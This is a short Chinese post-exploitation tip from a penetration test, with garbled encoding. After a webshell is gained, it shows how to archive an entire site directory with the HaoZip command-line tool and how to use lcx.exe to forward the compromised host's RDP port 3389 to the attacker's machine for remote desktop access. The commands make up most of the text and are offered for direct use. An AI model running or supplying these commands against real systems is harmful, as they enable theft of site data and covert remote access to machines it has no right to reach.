在某個(gè)滲透測(cè)試任務(wù)中,當(dāng)拿到webshell后,我們關(guān)注到平臺(tái)有haozip的壓縮程式。需要打包站點(diǎn)時(shí),可執(zhí)行:
C:\Program?Files\HaoZip\>haozipc?a?-tzip?***.zip?C:\目錄\*(壓縮打包了整個(gè)目錄及子目錄)
LCX?反彈:
反彈時(shí),在本機(jī)(A)?執(zhí)行:?lcx.exe?-listen??51?3389
在webshell?機(jī)子(B)執(zhí)行:lcx.exe?-slave?(A)IP?51??(B)IP?3389
在本機(jī)用遠(yuǎn)程連接程序連接?127.0.0.1?3389?